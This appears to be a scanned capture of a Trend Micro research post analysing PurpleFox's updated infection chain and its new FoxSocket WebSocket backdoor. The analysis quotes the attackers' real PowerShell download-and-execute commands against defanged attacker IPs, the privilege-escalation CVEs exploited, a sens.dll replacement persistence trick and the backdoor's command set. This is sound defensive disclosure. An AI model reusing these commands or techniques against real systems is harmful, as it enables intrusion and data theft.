www.trendmicro.com
Open in
urlscan Pro
104.99.30.200
Public Scan
URL:
https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html
Submission: On October 20 via api from US — Scanned from DE
Submission: On October 20 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
</tr>
</tbody>
</table>
</div>
</form><form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form-mobile">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
<td class="gsc-search-close collapsed" style="width:1%;" data-target="#search-mobile-wrapper" data-toggle="collapse">
<span class="icon-close"></span>
</td>
</tr>
</tbody>
</table>
</div>
</form>POST #
<form class="acsb-form" data-acsb-search="form" enctype="multipart/form-data" action="#" method="POST"> <input type="text" tabindex="0" name="acsb_search" autocomplete="off" placeholder="Search the online dictionary..."
aria-label="Search the online dictionary..."> <i class="acsbi-search"></i> </form>Text Content
Skip to Content
↵ENTER
Skip to Menu
↵ENTER
Skip to Footer
↵ENTER
dismiss
3 Alerts
* Our cloud workload protection meets all of Gartner's 8 recommendations
dismiss
See how
* Secure Cloud Migration 101
dismiss
Read article
* Micro Frontend Guide: Overview
dismiss
Get the facts
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Home Office Online Store
* Renew Online
* Free Tools
* Find a Partner
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Asia Pacific
* Australia
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* Europe, Middle East & Africa
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Middle East and North Africa
* Nederland
* Norge (Norway)
* Polska (Poland)
* Россия (Russia)
* South Africa
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
Business
For Home
Products Products
Hybrid Cloud Security
Workload Security
Conformity
Container Security
File Storage Security
Application Security
Network Security
Open Source Security
Network Security
Intrusion Prevention
Advanced Threat Protection
Industrial Network Security
Mobile Network Security
User Protection
Endpoint Security
Email Security
Mobile Security
Web Security
Industrial Endpoint
Detection & Response
XDR
Endpoint Detection & Response
Zero Trust Risk Insights
Powered by
AI/Machine Learning
Global Threat Intelligence
Connected Threat Defense
All Products & Trials
All Solutions
Service Packages
Small & Midsize Business Security
Solutions Solutions
For Cloud
Cloud Migration
Cloud-Native App Development
Cloud Operational Excellence
Data Center Security
SaaS Applications
Internet of Things (IoT)
Smart Factory
Connected Car
Connected Consumer
5G Security for Enterprises
Risk Management
Ransomware
End-of-Support Systems
Compliance
Detection and Response
Industries
Healthcare
Manufacturing
Federal
Why Trend Micro Why Trend Micro
The Trend Micro Difference
Customer Successes
Strategic Alliances
Industry Leadership
Research Research
Research
About Our Research
Research and Analysis
Research, News and Perspectives
Security Reports
Security News
Zero Day Initiative (ZDI)
Blog
Research by Topic
Vulnerabilities
Annual Predictions
The Deep Web
Internet of Things (IoT)
Resources
DevOps Resource Center
CISO Resource Center
What is?
Threat Encyclopedia
Cloud Health Assessment
Cyber Risk Assessment
Enterprise Guides
Glossary of Terms
Services & Support Services & Support
Services
Service Packages
Managed XDR
Support Services
Business Support
Log In to Support
Technical Support
Virus & Threat Help
Renewals & Registration
Education & Certification
Contact Support
Downloads
Free Cleanup Tools
Find a Support Partner
For Popular Products
Deep Security
Apex One
Worry-Free
Worry-Free Renewals
Partners Partners
Channel Partners
Channel Partner Overview
Managed Service Provider
Cloud Service Provider
Professional Services
Resellers
Marketplace
System Integrators
Alliance Partners
Alliance Overview
Technology Alliance Partners
Our Alliance Partners
Tools and Resources
Find a Partner
Education and Certification
Partner Successes
Distributors
Partner Login
Company Company
Overview
Leadership
Customer Success Stories
Strategic Alliances
Industry Accolades
Newsroom
Webinars
Events
Security Experts
Careers
History
Corporate Social Responsibility
Diversity, Equity & Inclusion
Trust Center
Internet Safety and Cybersecurity Education
Investors
Legal
×
Folio (0)
3 Alerts
* Our cloud workload protection meets all of Gartner's 8 recommendations
dismiss
See how
* Secure Cloud Migration 101
dismiss
Read article
* Micro Frontend Guide: Overview
dismiss
Get the facts
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Home Office Online Store
* Renew Online
* Free Tools
* Find a Partner
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Asia Pacific
* Australia
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* Europe, Middle East & Africa
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Middle East and North Africa
* Nederland
* Norge (Norway)
* Polska (Poland)
* Россия (Russia)
* South Africa
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
* Our cloud workload protection meets all of Gartner's 8 recommendations
dismiss
See how
* Secure Cloud Migration 101
dismiss
Read article
* Micro Frontend Guide: Overview
dismiss
Get the facts
* No new notifications at this time.
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
* Home Office Online Store
* Renew Online
* Free Tools
* Find a Partner
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
* The Americas
* United States
* Brasil
* Canada
* México
* Asia Pacific
* Australia
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* Europe, Middle East & Africa
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Middle East and North Africa
* Nederland
* Norge (Norway)
* Polska (Poland)
* Россия (Russia)
* South Africa
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
undefined
Cyber Threats
PurpleFox Adds New Backdoor That Uses WebSockets
Subscribe
Content added to Folio
Folio (0) close
Cyber Threats
PURPLEFOX ADDS NEW BACKDOOR THAT USES WEBSOCKETS
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious
activity related to a PurpleFox operator. Our findings led us to investigate an
updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732)
and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy October 19, 2021 Read time: 9
min (2524 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious
activity related to a PurpleFox operator. Our findings led us to investigate an
updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732)
and optimized rootkit capabilities leveraged in their attacks.
We also found a new backdoor written in .NET implanted during the intrusion,
which we believe is highly associated with PurpleFox. This backdoor, which we
call FoxSocket, leverages WebSockets to communicate with its command-and-control
(C&C) servers, resulting in a more robust and secure means of communication
compared to regular HTTP traffic.
We believe that this particular threat is currently being aimed at users in the
Middle East. We first encountered this threat via customers in the region. We
are currently investigating if it has been found in other parts of the world.
In this blog, we describe some of the observed modifications for the initial
PurpleFox payloads, alongside the new implanted .NET backdoor and the C2
infrastructure serving its functionality.
PurpleFox Capabilities and Technical Analysis
PowerShell
The activity starts with either of the following PowerShell commands being
executed:
* "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object
Net.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');MsiMake
hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png"
* "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object
Net.WebClient).DownloadString('http[:]//117.187.136.141[:]13405/57BC9B7E.Png');MsiMake
http[:]//117.187.136.141[:]13405/0CFA042F.Png"
These commands download a malicious payload from the specified URLs, which are
hosted on multiple compromised servers. These servers are part of the PurpleFox
botnet, with most of these located in China:
Table 1. Location of PurpleFox servers Country Server count China 345 India 34
Brazil 29 United States 26 Others 113
The fetched payload is a long script consisting of three components:
1. Tater (Hot Potato – privilege escalation)
2. PowerSploit
3. Embedded exploit bundle binary (privilege escalation)
The script targets 64-bit architecture systems. It starts by checking the
Windows version and applied hotfixes for the vulnerabilities it is targeting.
* Windows 7/Windows Server 2008
* CVE-2020-1054 (KB4556836, KB4556843)
* CVE-2019-0808 (KB4489878, KB4489885, KB2882822)
* Windows 8/Windows Server 2012
* CVE-2019-1458 (KB4530702, KB4530730)
* Windows 10/Windows Server 2019
* CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)
After selecting the appropriate vulnerability, it uses the PowerSploit module to
reflectively load the embedded exploit bundle binary with the target
vulnerability and an MSI command as arguments. As a failover, it uses the Tater
module to launch the MSI command.
The goal is to install the MSI package as an admin without any user interaction.
MSI Package
The MSI package starts by removing the following registry keys, which are old
Purple Fox installations if any are present:
* HKLM\SYSTEM\CurrentControlSet\Services\{ac00-ac10}
It then installs the components (dbcode21mk.log and setupact64.log) of the
Purple Fox backdoor to Windows directory. Afterward, it sets two registry values
under the key “HKLM\SYSTEM\CurrentControlSet\Control\Session Manager”:
* AllowProtectedRenames to 0x1, and
* PendingFileRenameOperations to the following:
\??\C:\Windows\AppPatch\Acpsens.dll
\??\C:\Windows\system32\sens.dll
\??\C:\Windows\AppPatch\Acpsens.dll
\??\C:\Windows\system32\sens.dll
\??\C:\Windows\setupact64.log
\??\C:\Windows\system32\sens.dll
These commands move sens.dll to C:\Windows\AppPatch\Acpsens.dll and replace it
with the installed file setupact64.log.
The MSI package then runs a .vbs script that creates a Windows firewall rule to
block incoming connections on ports 135, 139, and 445. As a final step, the
system is restarted to allow PendingFileRenameOperations to take place,
replacing sens.dll, which will make the malware run as the System Event
Notification Service (SENS).
PurpleFox Backdoor
The installed malware is a .dll file protected with VMProtect. Using the other
data file installed by the MSI package, it unpacks and manually loads different
DLLs for its functionality. It also has a rootkit driver that is also unpacked
from the data file and is used to hide its files, registry keys, and processes.
The sample starts by copying itself to another file and installing a new
service, then restoring the original sens.dll file. Afterward, it loads the
driver to hide its files and registries and then spawns and injects a sequence
of a 32-bit process to inject its code modules into, as they are 32-bit DLLs.
Figure 1. PurpleFox installation process
WebSocket Backdoor
Initial Delivery
The initial activity for retrieving this backdoor was captured three days after
the previous PurpleFox intrusion attempts on the same compromised server. The
Trend Micro Vision One™ platform flagged the following suspicious PowerShell
commands:
* "cmd.exe" /c powershell -c "iex((new-object
Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))"
* "cmd.exe" /c powershell -c "iex((new-object
Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))"
* "cmd.exe" /c powershell -c "iex((new-object
Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))"
* "cmd.exe" /c powershell -c "iex((new-object
Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))"
* "cmd.exe" /c powershell -c "iex((new-object
Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))"
* "cmd.exe" /c powershell -c "iex((new-object
Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))"
* "cmd.exe" /c powershell -c "iex((new-object
Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))"
Figure 2. Trend Micro Vision One alert for PowerShell commands
We analyzed the payload hosted on the URLs, which were variations of
185[.]112.144.245/a/[1-9], and all were found to be serving two variants of
another PowerShell script that acts as the main downloader for the .NET
backdoor.
Figure 3. Contents of payload
The difference between the two observed PowerShell scripts were in
Base64-encoded data that was passed as an argument to the .NET sample downloaded
from 185[.]112[.]144[.]45/a/data and finally invoked with this configuration
parameter. We found two different configuration parameters used: We observed the
first one on August 26 and the second one with more domains embedded on August
30. The decoded Base64-encoded configuration parameters are shown in the
following figures:
Figure 4. August 26 configuration
Figure 5. August 30 configuration
These configuration parameters will be used by the .NET initialization routines
to pick a C&C server and initialize cryptographic functions for the C&C channel.
Aside from the configuration, the payload itself is retrieved from
185.112.144[.]45/a/data. We also found some old variants that date back to June
22 that have fewer capabilities than the more recent variants.
During the earliest iterations for deploying this backdoor, aligning with the
creation data of the malicious domain advb9fyxlf2v[.]com, the configuration
parameters had a minimal number of subdomains to contact the C&C servers
compared to the recent one.
Figure 6. Backdoor configuration
.NET Backdoor Obfuscation
Let us start the analysis with the backdoor dropped on the SQL server. When
decompiled, it will output some obfuscated symbols, although most of these
can’t be restored to the original. Merely making them to be human-readable is
sufficient for basic static analysis. Sometimes, some of the original names can
be restored.
Figure 7. Cleaned classes and method names
One notable characteristic we rarely see in malware is leveraging WebSocket
communication to the C&C servers for an efficient bidirectional channel between
the infected client and the server.
WebSocket is a communication technology that supports streams of data to be
exchanged between a client and a server over just a single TCP session. This is
different from traditional request or response protocols like HTTP. This gives
the threat actor a more covert alternative to HTTP requests and responses
traffic, which creates an opportunity for a more silent exfiltration with less
likelihood of being detected.
Figure 8. Traditional (left) and WebSocket techniques (right)
It initializes a WebSocket communication with its C&C server and keeps it open
by sending keepalive messages to maintain the TCP connection. Once this is
established, a series of bidirectional messages will be exchanged between the
infected machine and the selected C&C server to negotiate a session encryption
key.
Figure 9. TCP/IP exchanges between client and server
The execution starts by initializing the WebSocket and registering four callback
functions as handlers for the WebSocket events.
Figure 10. Function for registering callback functions
One of the relevant callbacks is onOpen, which will initialize the C&C channel
encryption parameters once the WebSocket object is fired for the first time. As
shown in the next section, this is mainly for implementing the first
Diffie-Hellman (DH) key exchange message with the C&C server. On the other side,
the onReceive handler will process and dispatch all the commands received from
the server after a secure communication channel is established and when the
session encryption key is updated.
Key Negotiations
The first key exchange with the C&C server is carried out by the onOpen callback
registered function, as seen in Figure 11.
Figure 11. onOpen function
It initializes the EC DH object with some parameters to start the shared secret
key negotiation. The ECDiffieHellmanKeyDerivationFunction property is then set
to Hash. This property is for specifying the key derivation function that the
ECDiffieHellmanCng class will use to convert secret agreements into key
material, so a hash algorithm is used to generate key material (instead of HMAC
or TLS).
Afterward, the client will try to send the property PublicKey, which will be
used at the C&C side on another ECDiffieHellmanCng object to generate a shared
secret agreement. Eventually, this data will be sent on the WebSocket as the
first key exchange message. However, instead of sending it in cleartext, the
client deploys a symmetric AES encryption for any communication over the
WebSocket for the first exchange, as no shared secret is established yet, and
the AES encryption will generate a default key for this first exchange.
Figures 12-13. Function and code for the AES encryption key
This will result in the key negotiation message being encrypted with AES using
the shown parameters and a dummy key generated (111….11)[32] named byte_0 in the
following debugging session with the actual AES cipher text with a fixed length
of 176 bytes.
Figure 14. Structure of key exchange message
The 176 encrypted bytes are the actual data that will be sent over the
WebSocket, which marks the end of the first key exchange message.
Second Exchange (C&C to Victim)
The second key exchange message is sent from the server to the client that will
be handled by the onReceive function. The execution is invoked by the message
handler.
Figure 15. Invoking the onReceive function
This AES-encrypted second exchange has a fixed length of 304 bytes.
Figure 16. Contents of incoming message
It then checks if this incoming message is related to the control plane key
establishment or just a normal data command.
If it is related to the former, the first step is to decrypt the symmetric
encryption on the C2 channel then finalize the shared secret generation by
handing the execution to ECDH derivation function method_7.
Figure 17. Handoff to method_7 function
The client will verify the signed message by loading the RSA public key loaded
from the configuration payload shown in the previous section. If the signature
is verified correctly, key material will be derived from the DH exchange and
will be saved as the permanent symmetric AES encryption key (Symmetric_AES_key
variable) that will be used as long as the WebSocket channel is active.
Figure 18. method_7 function
Third Exchange (Victim to C&C)
Once an efficient encrypted session is established over the WebSocket, the
client will fingerprint the machine by extracting specific data (including the
username, machine name, local IP, MAC address, and Windows version) and will
relay such data over the secure channel to get the victim profiled at the server
side, which is the final exchange before the WebSocket channel is fully
established. It will then listen for further commands, which will be covered in
the next section.
As the fingerprinting data collected will be different from one execution
environment to another, this message will vary in length. From our lab analysis,
it was 240 bytes with the newly generated shared secret key.
Figure 19. Newly generated secret key
As far as the WebSocket is maintained with the keepalive messages shown earlier,
the operators can signal any command to be executed, so what happens next mainly
depends on the targeting and the actual motivation of the operator.
WebSocket Commands
In this section, we cover some of the observed commands sent from the server.
There are some minor differences between variants across them with regard to the
command numbers and the supported functionality.
All the handling of commands is implemented in the main dispatch routine (except
for command 160, which is used for key negotiation or renegotiation).
Table 2. List of commands Command code Functionality 20 Sends the current date
on the victim machine 30 Leaks DriveInfo.GetDrives() results info for all the
drives 40 Leaks DirectoryInfo() results info for a specific directory 50
FileInfo()results info for a specific file 60 Recursive directory search
70 Executes WMI queries - ManagementObjectSearcher() 80 Closes the WebSocket
Session 90 Exits the process 100 Spawns a new process
110 Downloads more data from a specific URL to the victim machine
120 DNS lookup from the victim machine
130 Leaks specific file contents from the victim machine
140 Writes new content to a specific location
150 Downloads data then write to a specific file
160 Renegotiates session key for symmetric encryption
180 Gets current process ID/Name
210 Returns the configuration parameter for the backdoor
220 Kills the process then start the new process with a different config
230 Kills specific process with PID
240 Queries internal backdoor object properties
260 Leaks hashes of some specific files requested
270 Kills list of PIDs
280 Deletes list of files/directories requested 290 Moves list of
files/directories to another location
300 Creates new directory to a specific location
WebSocket C&C Infrastructure
At the time of this writing, there were several active C&C servers controlling
the WebSocket clients. By profiling the infected targets and interacting through
different commands sent, we listed the observed IP addresses and the registered
domains found in the PowerShell downloaders and the backdoor configuration
parameters.
Table 3. WebSocket C&C serversIP address Description ASN Notable activity IP
address Description ASN Notable activity 185.112.144.245
(Hosting PS payloads, /a/[1-9])
(Hosting .Net Payload, /a/data)
AS 44925 ( 1984 ehf )
Iraq, Saudi Arabia, Turkey, UAE 185.112.147.50 C&C server Turkey, US, UAE
185.112.144.101 Turkey 93.95.226.157 US 93.95.228.163 US 93.95.227.183 -
93.95.227.169 UAE 93.95.227.179 - 185.112.146.72 Potential C&C server -
185.112.146.83 -
The backdoor picks one subdomain randomly from the configuration data and tries
to connect via WebSockets. If it fails to connect on port 12345, it will try to
resolve another subdomain.
Figure 20. Random C&C servers
The main domain advb9fyxlf2v[.]com used by these servers — registered on June
17, 2021, just within days of the first observed variant — is mainly for load
balancing across the multiple active servers.
Conclusion
The rootkit capabilities of PurpleFox make it more capable of carrying out its
objectives in a stealthier manner. They allow PurpleFox to persist on affected
systems as well as deliver further payloads to affected systems. We are still
monitoring these new variants and their dropped payloads. The new .NET WebSocket
backdoor (called FoxSocket, which we detect as Backdoor.MSIL.PURPLEFOX.AA) is
being closely monitored to discover any more information about this threat
actor’s intentions and objectives.
Trend Micro Solutions and Indicators of Compromise
The capabilities of the Trend Micro Vision One platform made both the detection
of this attack and our investigation into it possible. We took into account
metrics from the network and endpoints that would indicate potential attempts of
exploitation. The Trend Micro Vision One Workbench shows a holistic view of the
activities that are observed in a user’s environment by highlighting important
attributes related to the attack.
Trend Micro Managed XDR offers expert threat monitoring, correlation, and
analysis from experienced cybersecurity industry veterans, providing 24/7
service that allows organizations to have one single source of detection,
analysis, and response. This service is enhanced by solutions that combine AI
and Trend Micro’s wealth of global threat intelligence.
All IOCs related to this attack can be found in this separate file.
Tags
Malware | Endpoints | Research | Articles, News, Reports | Cyber Threats
AUTHORS
* Abdelrhman Sharshar
Threat Intelligence Analyst
* Jay Yaneza
Director, MDR Operations
* Sherif Magdy
Threat Intelligence Analyst
Contact Us
Subscribe
RELATED ARTICLES
* Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via
Trend Micro Cloud One and Trend Micro Vision One
* October Patch Tuesday: 3 Critical Bulletins Among 71
* Security Risks with Private 5G in Manufacturing Companies Part. 2
Archives
* Contact Sales
* Locations
* Careers
* Newsroom
* Trust Center
* Privacy
* Accessibility
* Support
* Site map
* linkedin
* twitter
* facebook
* youtube
* instagram
* rss
Copyright © 2021 Trend Micro Incorporated. All rights reserved.
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
WELCOME TO TREND MICRO
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.
{{opt_in}}
Accept
Learn more
AddThis Sharing Sidebar
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintMore AddThis
Share optionsAddThis
5
SHARES
Hide
Show
Close
AddThis
English
Accessibility Adjustments
Reset Settings Statement Hide Interface
Choose the right accessibility profile for you
OFF ON
Seizure Safe Profile Eliminates flashes and reduces color
This profile enables epileptic and seizure prone users to browse safely by
eliminating the risk of seizures that result from flashing or blinking
animations and risky color combinations.
OFF ON
Vision Impaired Profile Enhances the website's visuals
This profile adjusts the website, so that it is accessible to the majority of
visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract,
Glaucoma, and others.
OFF ON
Cognitive Disability Profile Assists with reading and focusing
This profile provides various assistive features to help users with cognitive
disabilities such as Autism, Dyslexia, CVA, and others, to focus on the
essential elements of the website more easily.
OFF ON
ADHD Friendly Profile More focus and fewer distractions
This profile significantly reduces distractions, to help people with ADHD and
Neurodevelopmental disorders browse, read, and focus on the essential elements
of the website more easily.
OFF ON
Blind Users (Screen-reader) Use the website with your screen-reader
This profile adjusts the website to be compatible with screen-readers such as
JAWS, NVDA, VoiceOver, and TalkBack. A screen-reader is software that is
installed on the blind user’s computer and smartphone, and websites should
ensure compatibility with it.
Note: This profile prompts automatically to screen-readers.
OFF ON
Keyboard Navigation (Motor) Use the website with the keyboard
This profile enables motor-impaired persons to operate the website using the
keyboard Tab, Shift+Tab, and the Enter keys. Users can also use shortcuts such
as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics)
to jump to specific elements.
Note: This profile prompts automatically for keyboard users.
Content Adjustments
Content Scaling
Default
Readable Font
Highlight Titles
Highlight Links
Text Magnifier
Adjust Font Sizing
Default
Align Center
Adjust Line Height
Default
Align Left
Adjust Letter Spacing
Default
Align Right
Color Adjustments
Dark Contrast
Light Contrast
Monochrome
High Saturation
Adjust Text Colors
Cancel
High Contrast
Adjust Title Colors
Cancel
Low Saturation
Adjust Background Colors
Cancel
Orientation Adjustments
Mute Sounds
Hide Images
Read Mode
Reading Guide
Useful Links
Select an option Home Header Footer Main Content
Stop Animations
Reading Mask
Highlight Hover
Highlight Focus
Big Black Cursor
Big White Cursor
HIDDEN_ADJUSTMENTS
Keyboard Navigation
Accessible Mode
Screen Reader Adjustments
Read Mode
Web Accessibility Solution By accessiBe
Choose the Interface Language
English
Español
Deutsch
Português
Français
Italiano
עברית
繁體中文
Pусский
عربى
عربى
Nederlands
繁體中文
日本語
Hide Accessibility Interface? Please note: If you choose to hide the
accessibility interface, you won't be able to see it anymore, unless you clear
your browsing history and data. Are you sure that you wish to hide the
interface?
Accept Cancel
Continue
Processing the data, please give it a few seconds...